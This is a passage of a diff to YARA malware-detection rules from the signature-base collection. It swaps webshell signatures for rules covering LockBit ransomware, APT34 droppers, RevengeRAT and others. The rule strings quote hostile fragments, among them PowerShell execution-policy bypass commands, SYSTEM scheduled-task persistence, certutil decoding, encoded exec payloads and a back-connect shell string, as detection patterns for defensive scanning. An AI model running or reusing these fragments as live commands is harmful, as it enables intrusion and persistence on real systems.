+		author = "Florian Roth (Nextron Systems)"
+		id = "115d1ec9-6c4f-587e-977c-cd24ada89ab6"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_scripts.yar#L344-L360"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "473b7d226ea6ebaacc24504bd740822e"
-		logic_hash = "7316c93f12dbbf6d0235601d8be88c199e37955507925222d00041d0ceaf01c7"
-		score = 75
+		hash = "4195370c103ca467cddc8f2724a8e477635be424"
+		logic_hash = "49f41162919bb04744041ae6f7438e61d98fb7d5984a17535d9c4ce4d398671b"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "#We Are: MasterKid, AleXutz, FatMan & MiKuTuL                                   "
-		$s1 = "echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shel"
-		$s2 = "ConnectBack Backdoor"
+		$s0 = "Destination: http://202.113.20.235/gj/images/2.asp" fullword ascii
+		$s1 = "HOST: 202.113.20.235" fullword ascii
+		$s2 = "MOVE /gj/images/A.txt HTTP/1.1" fullword ascii
 
 	condition:
-		1 of them
+		filesize < 1KB and all of them
 }
-rule SIGNATURE_BASE_Defacekeeper_0_2_Php
+rule SIGNATURE_BASE_CN_Honker_Mssqlpw_Scan : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file DefaceKeeper_0.2.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "671323e2-42cb-5ce0-9839-5d01c446471c"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4333-L4345"
+		description = "Script from disclosed CN Honker Pentest Toolset - file mssqlpw scan.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7dc29d06-e1e7-527f-b9e5-d75f660fd73e"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_scripts.yar#L362-L377"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "713c54c3da3031bc614a8a55dccd7e7f"
-		logic_hash = "0ee3fed3441e9561867508e324d7a6b1808a8923513bf1c9b82f8238224c994c"
-		score = 75
+		hash = "e49def9d72bfef09a639ef3f7329083a0b8b151c"
+		logic_hash = "eb3bd38ca317f0b10358581fc3dbb8ca81b991b9a4f4f2d256d81a31028411b9"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "target fi1e:<br><input type=\"text\" name=\"target\" value=\"index.php\"></br>" fullword
-		$s1 = "eval(base64_decode(\"ZXZhbChiYXNlNjRfZGVjb2RlKCJhV2R1YjNKbFgzVnpaWEpmWVdKdmNuUW9"
-		$s2 = "<img src=\"http://s43.radikal.ru/i101/1004/d8/ced1f6b2f5a9.png\" align=\"center"
+		$s0 = "response.Write(\"I Get it ! Password is <font color=red>\" & str & \"</font><BR>" ascii
+		$s1 = "response.Write \"Done!<br>Process \" & tTime & \" s\"" fullword ascii
 
 	condition:
-		1 of them
+		filesize < 6KB and all of them
 }
-rule SIGNATURE_BASE_Shells_PHP_Wso
+rule SIGNATURE_BASE_SUSP_RAR_Single_Doc_File : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file wso.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "fdce6094-a88e-5da6-aeb0-bc97b15bf397"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4346-L4357"
+		description = "Detects suspicious RAR files that contain nothing but a single .doc file"
+		author = "Florian Roth (Nextron Systems)"
+		id = "92dc3a5d-d12c-56d3-8531-25b3da1e1595"
+		date = "2020-07-11"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_hunting_susp_rar.yar#L3-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "33e2891c13b78328da9062fbfcf898b6"
-		logic_hash = "31ef69228b66b30300006f63b1e4d6e92c2512caca4bd915d418b48564b39c47"
-		score = 75
+		logic_hash = "bfc8c60c86e65e041976dac9d15c486ad99da930849bd697c869eec0a2626c38"
+		score = 40
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$s0 = "$back_connect_p=\"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbi"
-		$s3 = "echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=pos"
+		$s1 = ".doc"
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x6152 and filesize < 4000KB and $s1 at ( uint16( 5 ) + uint16( uint16( 5 ) + 5 ) + uint16( uint16( 5 ) + uint16( uint16( 5 ) + 5 ) + 5 ) - 9 ) and ( uint16( 5 ) + uint16( uint16( 5 ) + 5 ) + uint16( uint16( 5 ) + uint16( uint16( 5 ) + 5 ) + 5 ) + uint32( uint16( 5 ) + uint16( uint16( 5 ) + 5 ) + 7 ) > filesize -8 )
 }
-rule SIGNATURE_BASE_Backdoor1_Php
+rule SIGNATURE_BASE_Gen_Python_Pyminifier_Encoded_Payload : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file backdoor1.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "89f44a1c-8a42-58f6-9308-371f4e652bff"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4358-L4370"
+		description = "Detects python code encoded by pyminifier. Used by the Machete malware as researched by ESET"
+		author = "John Lambert @JohnLaTwC"
+		id = "d7297e6a-e1c7-57dd-a57f-a3b67face2f3"
+		date = "2019-12-16"
+		modified = "2023-12-05"
+		reference = "https://github.com/liftoff/pyminifier"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_python_pyminifier_encoded_payload.yar#L1-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e1adda1f866367f52de001257b4d6c98"
-		logic_hash = "7c8840dc91c16b9fa19fee16e0159a7f13db23c96596e18da0cdab07931ce35b"
+		hash = "01df8765ea35db382d1dd67a502bf1d9647d8fe818ec31abff41c7e41c2816c0"
+		hash = "15d201152a9465497a0f9dd6939e48315b358702c5e2a3c506ad436bb8816da7"
+		hash = "ab91f76394ddf866cc0b315d862a19b57ded93be5dfc2dd0a81e6a43d0c5f301"
+		hash = "b67256906d976aafb6071d23d1b3f59a1696f26b25ff4713b9342d41e656dfba"
+		hash = "d5664c70f3543f306f765ea35e22829dbea66aec729e8e11edea9806d0255b7e"
+		hash = "dd2b0e2c2cb8a83574248bda54ce472899b22eb602e8ebecafcce2c4355177fe"
+		hash = "ed76bd136f40a23aeffe0aba02f13b9fea3428c19b715aafa6ea9be91e4006ca"
+		hash = "b454179c13cb4727ae06cc9cd126c3379e2aded5c293af0234ac3312bf9bdad2"
+		logic_hash = "6e744d9404ca476766b217fe808ba6a8cc6cbf09232a69aae6259acd377080a0"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$s1 = "echo \"[DIR] <A HREF=\\\"\".$_SERVER['PHP_SELF'].\"?rep=\".realpath($rep.\".."
-		$s2 = "class backdoor {"
-		$s4 = "echo \"<a href=\\\"\".$_SERVER['PHP_SELF'].\"?copy=1\\\">Copier un fichier</a> <"
+		$s1 = "exec(zlib.decompress(base64.b64decode('eJ"
+		$s2 = "base64" fullword
+		$s3 = "zlib" fullword
 
 	condition:
-		1 of them
+		filesize < 20KB and uint32be( 0 ) == 0x696d706f and all of them
 }
-rule SIGNATURE_BASE_Elmaliseker_Asp
+rule SIGNATURE_BASE_MAL_RANSOM_LNX_Macos_Lockbit_Apr23_1 : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file elmaliseker.asp.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "7ecf3d5c-be91-579e-905b-5f2ad03a0e42"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4371-L4384"
+		description = "Detects LockBit ransomware samples for Linux and macOS"
+		author = "Florian Roth"
+		id = "c01cb907-7d30-5487-b908-51f69ddb914c"
+		date = "2023-04-15"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/malwrhunterteam/status/1647384505550876675?s=20"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_lockbit_lnx_macos_apr23.yar#L2-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b32d1730d23a660fd6aa8e60c3dc549f"
-		logic_hash = "969f0f12449375a9ebbb8a68fd4b3db395927416d5cceccdb7f2c64310430880"
-		score = 75
+		logic_hash = "6d838e8b207b97d7c335dc4066de2c6dc87f7adc9cac31742677edbe85386cf7"
+		score = 85
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		hash1 = "0a2bffa0a30ec609d80591eef1d0994d8b37ab1f6a6bad7260d9d435067fb48e"
+		hash2 = "9ebcbaf3c9e2bbce6b2331238ab584f95f7ced326ca4aba2ddcc8aa8ee964f66"
+		hash3 = "a405d034c01a357a89c9988ffe8a46a165915df18fd297469b2bcaaf97578442"
+		hash4 = "c9cac06c9093e9026c169adc3650b018d29c8b209e3ec511bbe34cbe1638a0d8"
+		hash5 = "dc3d08480f5e18062a0643f9c4319e5c3f55a2e7e93cd8eddd5e0c02634df7cf"
+		hash6 = "e77124c2e9b691dbe41d83672d3636411aaebc0aff9a300111a90017420ff096"
+		hash7 = "0be6f1e927f973df35dad6fc661048236d46879ad59f824233d757ec6e722bde"
+		hash8 = "3e4bbd21756ae30c24ff7d6942656be024139f8180b7bddd4e5c62a9dfbd8c79"
 
 	strings:
-		$s0 = "if Int((1-0+1)*Rnd+0)=0 then makeEmail=makeText(8) & \"@\" & makeText(8) & \".\""
-		$s1 = "<form name=frmCMD method=post action=\"<%=gURL%>\">"
-		$s2 = "dim zombie_array,special_array"
-		$s3 = "http://vnhacker.org"
+		$x1 = "restore-my-files.txt" ascii fullword
+		$s1 = "ntuser.dat.log" ascii fullword
+		$s2 = "bootsect.bak" ascii fullword
+		$s3 = "autorun.inf" ascii fullword
+		$s4 = "lockbit" ascii fullword
+		$xc1 = { 33 38 36 00 63 6D 64 00 61 6E 69 00 61 64 76 00 6D 73 69 00 6D 73 70 00 63 6F 6D 00 6E 6C 73 }
+		$xc2 = { 6E 74 6C 64 72 00 6E 74 75 73 65 72 2E 64 61 74 2E 6C 6F 67 00 62 6F 6F 74 73 65 63 74 2E 62 61 6B }
+		$xc3 = { 76 6D 2E 73 74 61 74 73 2E 76 6D 2E 76 5F 66 72 65 65 5F 63 6F 75 6E 74 00 61 2B 00 2F 2A }
+		$op1 = { 84 e5 f0 00 f0 e7 10 40 2d e9 2e 10 a0 e3 00 40 a0 e1 ?? fe ff }
+		$op2 = { 00 90 a0 e3 40 20 58 e2 3f 80 08 e2 3f 30 c2 e3 09 20 98 e1 08 20 9d }
+		$op3 = { 2d e9 01 70 43 e2 07 00 13 e1 01 60 a0 e1 08 d0 4d e2 02 40 }
 
 	condition:
-		1 of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16( 0 ) == 0xfeca or uint16( 0 ) == 0xfacf or uint32( 0 ) == 0xbebafeca ) and ( 1 of ( $x* ) or 3 of them ) or 2 of ( $x* ) or 5 of them
 }
-rule SIGNATURE_BASE_Indexer_Asp
+rule SIGNATURE_BASE_MAL_RANSOM_Lockbit_Apr23_1
 {
 	meta:
-		description = "Semi-Auto-generated  - file indexer.asp.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "84ff60f9-36f7-5d29-9f38-8088fb42582e"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4385-L4396"
+		description = "Detects indicators found in LockBit ransomware"
+		author = "Florian Roth"
+		id = "75dc8b95-16f0-5170-a7d6-fc10bb778348"
+		date = "2023-04-17"
+		modified = "2023-12-05"
+		reference = "https://objective-see.org/blog/blog_0x75.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_lockbit_lnx_macos_apr23.yar#L43-L67"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "9ea82afb8c7070817d4cdf686abe0300"
-		logic_hash = "0a51f15bfb4289dcb70e1e0b96d100be12901ebf26ed9c0e543eda5f4aa91f1c"
+		logic_hash = "cd5bffa5571abfd1446b065d26c8c23f00fe1376d505af539c6f37356014a86f"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$s0 = "<td>Nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typ"
-		$s2 = "D7nD7l.km4snk`JzKnd{n_ejq;bd{KbPur#kQ8AAA==^#~@%>></td><td><input type=\"submit"
+		$xe1 = "-i '/path/to/crypt'" xor
+		$xe2 = "http://lockbit" xor
+		$s1 = "idelayinmin" ascii
+		$s2 = "bVMDKmode" ascii
+		$s3 = "bSelfRemove" ascii
+		$s4 = "iSpotMaximum" ascii
+		$fp1 = "<html"
 
 	condition:
-		1 of them
+		(1 of ( $x* ) or 4 of them ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Dxshell_Php_Php
+rule SIGNATURE_BASE_MAL_RANSOM_Lockbit_Locker_LOG_Apr23_1
 {
 	meta:
-		description = "Semi-Auto-generated  - file DxShell.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "b89930b7-acf3-5078-8429-d59e27e4b00c"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4397-L4408"
+		description = "Detects indicators found in LockBit ransomware log files"
+		author = "Florian Roth"
+		id = "aa0a2393-e5a2-5151-8afb-91a9bb922179"
+		date = "2023-04-17"
+		modified = "2023-12-05"
+		reference = "https://objective-see.org/blog/blog_0x75.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_lockbit_lnx_macos_apr23.yar#L69-L84"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "33a2b31810178f4c2e71fbdeb4899244"
-		logic_hash = "821f9295eba6119ad08349e769d1909cd7836b4e35795915e94095cf715dc6e5"
+		logic_hash = "d5f96e601150209382d3f6458863bc79768beb99b587aa8d9ba37cb2c11ef634"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$s0 = "print \"\\n\".'Tip: to view the file \"as is\" - open the page in <a href=\"'.Dx"
-		$s2 = "print \"\\n\".'<tr><td width=100pt class=linelisting><nobr>POST (php eval)</td><"
+		$s1 = " is encrypted. Checksum after encryption "
+		$s2 = "~~~~~Hardware~~~~"
+		$s3 = "[+] Add directory to encrypt:"
+		$s4 = "][+] Launch parameters: "
 
 	condition:
-		1 of them
+		2 of them
 }
-rule SIGNATURE_BASE_S72_Shell_V1_1_Coding_Html
+rule SIGNATURE_BASE_MAL_RANSOM_Lockbit_Forensicartifacts_Apr23_1
 {
 	meta:
-		description = "Semi-Auto-generated  - file s72 Shell v1.1 Coding.html.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "dfd3b80e-6245-5f74-9d6a-6006218891ac"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4409-L4421"
+		description = "Detects forensic artifacts found in LockBit intrusions"
+		author = "Florian Roth"
+		id = "e716030c-ee78-51dc-919c-cf59e93da976"
+		date = "2023-04-17"
+		modified = "2023-12-05"
+		reference = "https://objective-see.org/blog/blog_0x75.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_lockbit_lnx_macos_apr23.yar#L86-L101"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c2e8346a5515c81797af36e7e4a3828e"
-		logic_hash = "aef8840b72e5c435c11150007d6b3af2943126fefdc6df343d0f73755340e260"
+		logic_hash = "81021f8c9aed17c007d7329a598c644a706fa9750818c8974984eefcba8d06c2"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$s0 = "Dizin</font></b></font><font face=\"Verdana\" style=\"font-size: 8pt\"><"
-		$s1 = "s72 Shell v1.0 Codinf by Cr@zy_King"
-		$s3 = "echo \"<p align=center>Dosya Zaten Bulunuyor</p>\""
+		$x1 = "/tmp/locker.log" ascii fullword
+		$x2 = "Executable=LockBit/locker_" ascii
+		$xc1 = { 54 6F 72 20 42 72 6F 77 73 65 72 20 4C 69 6E 6B 73 3A 0D 0A 68 74 74 70 3A 2F 2F 6C 6F 63 6B 62 69 74 }
 
 	condition:
-		1 of them
+		1 of ( $x* )
 }
-rule SIGNATURE_BASE_Kacak_Asp
+rule SIGNATURE_BASE_APT34_Malware_HTA : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file kacak.asp.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "1ae15174-b84a-5826-b768-7afed65196db"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4422-L4435"
+		description = "Detects APT 34 malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "683faded-7e4b-5b2f-9f85-300db96ed9d1"
+		date = "2017-12-07"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt34.yar#L12-L32"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "907d95d46785db21331a0324972dda8c"
-		logic_hash = "8542a3985dff2d1eb42f4d2c9f30405a4817a8e30075225c518ec52381f1f7df"
+		logic_hash = "0bf9b988b3ef46df29e0f91c3ea186aaab8a1ccb79563e97521311bf2e1215d7"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "f6fa94cc8efea0dbd7d4d4ca4cf85ac6da97ee5cf0c59d16a6aafccd2b9d8b9a"
 
 	strings:
-		$s0 = "Kacak FSO 1.0"
-		$s1 = "if request.querystring(\"TGH\") = \"1\" then"
-		$s3 = "<font color=\"#858585\">BuqX</font></a></font><font face=\"Verdana\" style="
-		$s4 = "mailto:BuqX@hotmail.com"
+		$x1 = "WshShell.run \"cmd.exe /C C:\\ProgramData\\" ascii
+		$x2 = ".bat&ping 127.0.0.1 -n 6 > nul&wscript  /b" ascii
+		$x3 = "cmd.exe /C certutil -f  -decode C:\\ProgramData\\" ascii
+		$x4 = "a.WriteLine(\"set Shell0 = CreateObject(" ascii
+		$x5 = "& vbCrLf & \"Shell0.run" ascii
+		$s1 = "<title>Blog.tkacprow.pl: HTA Hello World!</title>" fullword ascii
+		$s2 = "<body onload=\"test()\">" fullword ascii
 
 	condition:
-		1 of them
+		filesize < 60KB and ( 1 of ( $x* ) or all of ( $s* ) )
 }
-rule SIGNATURE_BASE_PHP_Backdoor_Connect_Pl_Php
+rule SIGNATURE_BASE_APT34_Malware_Exeruner : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file PHP Backdoor Connect.pl.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "96c9258e-3894-5ee9-b52c-eb7ba7454416"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4436-L4448"
+		description = "Detects APT 34 malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8ddfa59d-9b8a-5cb6-a992-6498ac9be75d"
+		date = "2017-12-07"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt34.yar#L34-L59"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "57fcd9560dac244aeaf95fd606621900"
-		logic_hash = "b141546f45767884f9c8b1cc4c09ea25f90c0f3a3633bfeecad78b60e7f20306"
+		logic_hash = "71840d9a0f8a5dc39656e6bf1ad94fa275bcd18baf6b374dfe040c161d62a960"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c75c85acf0e0092d688a605778425ba4cb2a57878925eee3dc0f4dd8d636a27a"
 
 	strings:
-		$s0 = "LorD of IRAN HACKERS SABOTAGE"
-		$s1 = "LorD-C0d3r-NT"
-		$s2 = "echo --==Userinfo==-- ;"
+		$x1 = "\\obj\\Debug\\exeruner.pdb" ascii
+		$x2 = "\"wscript.shell`\")`nShell0.run" wide
+		$x3 = "powershell.exe -exec bypass -enc \" + ${global:$http_ag} +" wide
+		$x4 = "/c powershell -exec bypass -window hidden -nologo -command " fullword wide
+		$x5 = "\\UpdateTasks\\JavaUpdatesTasksHosts\\" wide
+		$x6 = "schtasks /create /F /ru SYSTEM /sc minute /mo 1 /tn" wide
+		$x7 = "UpdateChecker.ps1 & ping 127.0.0.1" wide
+		$s8 = "exeruner.exe" fullword wide
+		$s9 = "${global:$address1} = $env:ProgramData + \"\\Windows\\Microsoft\\java\";" fullword wide
+		$s10 = "C:\\ProgramData\\Windows\\Microsoft\\java" fullword wide
+		$s11 = "function runByVBS" fullword wide
+		$s12 = "$84e31856-683b-41c0-81dd-a02d8b795026" fullword ascii
+		$s13 = "${global:$dns_ag} = \"aQBmACAAKAAoAEcAZQB0AC0AVwBtAGk" wide
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them
 }
-rule SIGNATURE_BASE_Antichat_Socks5_Server_Php_Php
+rule SIGNATURE_BASE_APT_Liudoor : WIN32_DLL
 {
 	meta:
-		description = "Semi-Auto-generated  - file Antichat Socks5 Server.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "35d0930c-ef07-5fd4-9d7a-c0d685f92339"
-		date = "2016-02-15"
-		modified = "2025-11-03"
+		description = "Detects Liudoor daemon backdoor"
+		author = "RSA FirstWatch"
+		id = "cf7e08b8-2ccd-5828-917b-11340b4a86b1"
+		date = "2015-07-23"
+		modified = "2023-12-05"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4449-L4461"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_terracotta_liudoor.yar#L1-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "cbe9eafbc4d86842a61a54d98e5b61f1"
-		logic_hash = "d6b203561f95f431b3d2c241011ae08c05619d45c5900a28137481c029e8297e"
+		logic_hash = "6f60002d0173a8ebd2b407e79377d4816e699742aedb1e0649b08fd4ca6cf359"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "WIN32 DLL"
+		hash0 = "78b56bc3edbee3a425c96738760ee406"
+		hash1 = "5aa0510f6f1b0e48f0303b9a4bfc641e"
+		hash2 = "531d30c8ee27d62e6fbe855299d0e7de"
+		hash3 = "2be2ac65fd97ccc97027184f0310f2f3"
+		hash4 = "6093505c7f7ec25b1934d3657649ef07"
+		type = "Win32 DLL"
 
 	strings:
-		$s0 = "$port = base_convert(bin2hex(substr($reqmessage[$id], 3+$reqlen+1, 2)), 16, 10);" fullword
-		$s3 = "#   [+] Domain name address type"
-		$s4 = "www.antichat.ru"
+		$string0 = "Succ"
+		$string1 = "Fail"
+		$string2 = "pass"
+		$string3 = "exit"
+		$string4 = "svchostdllserver.dll"
+		$string5 = "L$,PQR"
+		$string6 = "0/0B0H0Q0W0k0"
+		$string7 = "QSUVWh"
+		$string8 = "Ht Hu["
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Antichat_Shell_V1_3_Php
+rule SIGNATURE_BASE_Revengerat_Sep17 : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file Antichat Shell v1.3.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "856cf977-24da-58e0-b6d2-820c92075ecc"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4462-L4474"
+		description = "Detects RevengeRAT malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7e58af06-a0ce-532c-9483-b1eca5e3cc28"
+		date = "2017-09-04"
+		modified = "2020-07-27"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_revenge_rat.yar#L11-L34"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "40d0abceba125868be7f3f990f031521"
-		logic_hash = "566c324f3bf44ce9f32ddad82a8d3daa87a8a75b5ca0c8286bc912a8ae4ac8e9"
+		logic_hash = "467133402d6898f325cfd8c18308fc2a4dafd06c8624f9347225f16afd4035ce"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2a86a4b2dcf1657bcb2922e70fc787aa9b66ec1c26dc2119f669bd2ce3f2e94a"
+		hash2 = "7c271484c11795876972aabeb277c7b3035f896c9e860a852d69737df6e14213"
+		hash3 = "fe00c4f9c8439eea50b44f817f760d8107f81e2dba7f383009fde508ff4b8967"
 
 	strings:
-		$s0 = "Antichat"
-		$s1 = "Can't open file, permission denide"
-		$s2 = "$ra44"
+		$x1 = "Nuclear Explosion.g.resources" fullword ascii
+		$x4 = "5B1EE7CAD3DFF220A95D1D6B91435D9E1520AC41" fullword ascii
+		$x5 = "\\RevengeRAT\\" ascii
+		$x6 = "Revenge-RAT client has been successfully installed." ascii
+		$x7 = "Nuclear Explosion.exe" fullword ascii
+		$x8 = " Revenge-RAT 201" wide
+		$s1 = "{11111-22222-20001-00001}" fullword wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 500KB and 1 of ( $x* ) ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_Safe_Mode_Bypass_PHP_4_4_2_And_PHP_5_1_2_Php
+rule SIGNATURE_BASE_EXPL_LOG_CVE_2021_27065_Exchange_Forensic_Artefacts_Mar21_1 : LOG CVE_2021_27065
 {
 	meta:
-		description = "Semi-Auto-generated  - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "3e81f628-31b4-5c22-943e-62c8cb4c0c4d"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
